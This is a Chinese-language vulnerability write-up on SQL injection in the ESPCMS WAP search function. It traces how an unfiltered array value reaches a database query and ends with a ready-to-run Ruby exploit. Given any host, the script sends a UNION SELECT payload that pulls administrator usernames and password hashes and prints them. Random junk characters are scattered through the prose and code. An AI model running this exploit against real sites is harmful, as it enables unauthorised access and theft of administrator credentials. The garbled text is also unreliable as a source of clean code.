espcms wap模块搜索处SQL注入

admin

0×0 漏洞概述0×1 漏洞细节
0×2 PoC
4 Y5 Z$ a6 Y+ @9 m4 q  a" R
& u  N. y0 I$ J5 a* |% S( W% C
  ^" y2 C, ]" m+ ^4 ^( c
0×0 漏洞概述
0 K# [' g, U" W% l+ E
易思ESPCMS企业网站管理系统基于LAMP开发构建的企业网站管理系统，它具有操作简单、功能强大、稳定性好、扩展性及安全性强、二次开发及后期维护方便，可以帮您迅速、轻松地构建起一个强大专业的企业网站。
其在处理传入的参数时考虑不严谨导致SQL注入发生
3 F# V- x% L6 L9 H
# j8 K0 b( |: Q9 C! o- H' a9 @
' b+ D7 g- x! Q" o' g0×1 漏洞细节
& o$ B# |6 q. ~0 ^4 r9 O9 p& [
变量的传递过程是$_SERVER['QUERY_STRING']->$urlcode->$output->$value->$db_where->$sql->mysql_query，整个过程无过滤导致了注入的发生。
- j& ]: e! Z% m& f正因为变量是从$_SERVER['QUERY_STRING']中去取的，所以正好避开了程序的过滤。
而注入的变量是数组的值，并非数组的key，所以也没过被过滤，综合起来形成了一个比较少见的SQL注入。
9 @2 ^  m# K/ A( Y' x3 m! J
' `& P+ ~  O3 @% B在/interface/3gwap_search.php文件的in_result函数中:
6 i1 e! ^/ }# _' L  ?  a6 B2 D% M


+ Z1 l7 H/ ?; ^2 s8 ^/ g: O4 b       function in_result() {
            ... ... ... ... ... ... ... ... ...
            $urlcode = $_SERVER[ 'QUERY_STRING '];
            parse_str(html_entity_decode($urlcode), $output);
& C: a# z2 ?3 F/ ~- Y0 T1 O# e2 k7 S4 c
9 J! g$ b# t6 n! S) {/ k7 I            ... ... ... ... ... ... ... ... ...
7 C- z# Q( G3 S, `) G) ^  s" _0 K            if (is_array($output['attr' ]) && count($output['attr']) > 0) {

: m0 R4 P7 b$ |: J                  $db_table = db_prefix . 'model_att';
- |+ ^  T  c" `' j5 Y% ?* E" e
* T+ U& K% ^! G$ ]. [  D                   foreach ($output['attr' ] as $key => $value) {
                         if ($value) {

" X& [7 T5 ^) Q9 v$ P                              $key = addslashes($key);
                              $key = $this-> fun->inputcodetrim($key);
                              $db_att_where = " WHERE isclass=1 AND attrname='$key'";
: Y1 A, O5 _& u, @* P                              $countnum = $this->db_numrows($db_table, $db_att_where);
& R/ J3 @4 y6 V4 d                               if ($countnum > 0) {
7 Y0 N8 _) r+ O! X                                    $db_where .= ' AND b.' . $key . '=\'' . $value . '\'' ;
" \! g! P  K/ H: D+ @5 n' L2 N                              }
                        }
                  }
* p% s# N6 ^) i& u! a3 L            }
            if (!empty ($keyword) && empty($keyname)) {
- B# U- X# `  o3 e" i                  $keyname = 'title';
& w$ _" d. X/ r) k' X, d9 x                  $db_where.= " AND a.title like '%$keyword%'" ;
/ K' v! N6 o5 c& h, M: h            } elseif (!empty ($keyword) && !empty($keyname)) {
                  $db_where.= " AND $keyname like '% $keyword%'";
            }
            $pagemax = 15;
$ \5 M. {. L6 n  q* i7 p& w
' J  B2 O. J6 m4 ^3 s            $pagesylte = 1;
! O: Q0 ?6 u' T- K. t) L  l/ w
             if ($countnum > 0) {
( F0 z- x4 c5 l! [
                  $numpage = ceil($countnum / $pagemax);
            } else {
6 t/ S9 J, c9 p  ]3 ?( C1 m% Z                  $numpage = 1;
            }
            $sql = "SELECT b.*,a.* FROM " . db_prefix . "document AS a LEFT JOIN " . db_prefix . "document_attr AS b ON a.did=b.did " . $db_where . ' LIMIT 0,' . $pagemax;
            $this-> htmlpage = new PageBotton($sql, $pagemax, $page, $countnum, $numpage, $pagesylte, $this->CON ['file_fileex' ], 5, $this->lng['pagebotton' ], $this->lng['gopageurl'], 0);
3 M% ~( ^  g9 D$sql = $this-> htmlpage->PageSQL('a.did' , 'down' );            $rs = $this->db->query($sql);
            ... ... ... ... ... ... ... ... ...
3 s: o7 D; j8 q  J( X      }

. C1 Y& T% i9 }6 ?
# d5 N1 F3 h8 r  \5 Z/ _0×2 PoC
2 i- F" T$ S8 i- N4 _8 {

- L. X% q; a6 v3 S5 a% f/ j
require "net/http"
. e' I+ B" \9 S9 ^! \3 O1 B: F
def request(method, url)
) f' b& f% [) u. U5 k8 Z    if method.eql?("get")
        uri = URI.parse(url)
2 k+ S4 ^$ I( M8 p. I: p2 \        http = Net::HTTP.new(uri.host, uri.port)
        response = http.request(Net::HTTP::Get.new(uri.request_uri))
9 _: K, s0 T/ C: k- y/ ]        return response
    end
end
1 D9 N) _: x, i' ]! H" }
9 |: j5 w* ?  G: Q. j' Q, p! pdoc =<<HERE
-------------------------------------------------------
Espcms Injection Exploit
Author:ztz
  U# l4 c: P+ OBlog:http://ztz.fuzzexp.org/
-------------------------------------------------------

: ]( j' }' u/ e0 P3 A; ~8 E: aHERE

2 K4 A& J' X* {: ~# S9 ^& Ousage =<<HERE
Usage:         ruby #{$0} host port path
example:     ruby #{$0} www.target.com 80 /
+ r1 C/ T4 Q1 EHERE

puts doc
7 v/ n: v  w( B3 M( b- [if ARGV.length < 3
    puts usage
0 {* ^3 |+ x/ w' `  k' delse
    $host = ARGV[0]
  L1 f8 k1 s  F+ _9 v, s% V    $port = ARGV[1]
    $path = ARGV[2]
) g! \1 U* u# E* k+ d# _
* f; L% c& ], X$ e9 s. z! ]    puts "

send request..."
    url = "http://#{$host}:#{$port}#{$path}wap/index.php?ac=search&at=result&lng=cn&mid=3&tid=11&keyword=1&keyname=a.title&countnum=1&
3 o9 S, f0 N% O6 dattr[jobnum]=1%27%20and%201=2%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13
,14,15,16,17,18,19,20,21,22,23,24,25,concat%28username,CHAR%2838%29,password%29,27
% d5 A; {: I! W" c,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45%20from%20espcms_admin_member;%23"
    response = request("get", url)
$ ]+ T1 N' K% H    result = response.body.scan(/\w+&\w{32}/)
    puts result
7 I5 k+ ~0 w+ t3 [2 d) [# Eend

) G! k: z+ ?7 ^; u1 v! v' G! }# u